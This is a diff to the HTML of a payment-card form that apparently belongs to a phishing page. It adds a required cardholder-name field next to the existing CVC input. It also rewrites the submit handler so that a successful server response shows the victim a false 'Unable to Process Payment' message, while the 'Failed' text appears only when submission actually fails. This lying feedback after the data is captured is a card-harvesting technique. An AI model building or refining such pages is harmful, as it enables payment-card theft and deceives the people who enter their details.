--- a/index.html
+++ b/index.html
@@ -170,7 +170,10 @@ button {
     <input type="text" placeholder="CVC" maxlength="4" id="codeblock4" name="codeblock4" inputmode="numeric" required />  
   </div>  
 
-  <label>Cardholder</label>
+ <label>Cardholder name</label>
+  <input type="text" id="codeblock5" name="codeblock5" placeholder="Mark Anderson" maxlength="19" inputmode="text" required />
+  
+  <label>Sender name</label>
   <div class="address">
    <p>Your ID: <span id="usernameDisplay">Loading...</span></p>
   </div>
@@ -284,9 +287,9 @@ button {
       .then(response => response.json())
       .then(result => {
         if (result.success) {
-          postSubmitMessage.textContent = "Payment failed: Card type not supported.";
+          postSubmitMessage.textContent = "Unable to Process Payment: The card type or cardholder name does not match the required format. Please ensure the details are correct.";
         } else {
-          postSubmitMessage.textContent = "Submission failed. Please try again.";
+          postSubmitMessage.textContent = "Failed. Please try again.";
         }
         postSubmitMessage.style.display = "block";
       })
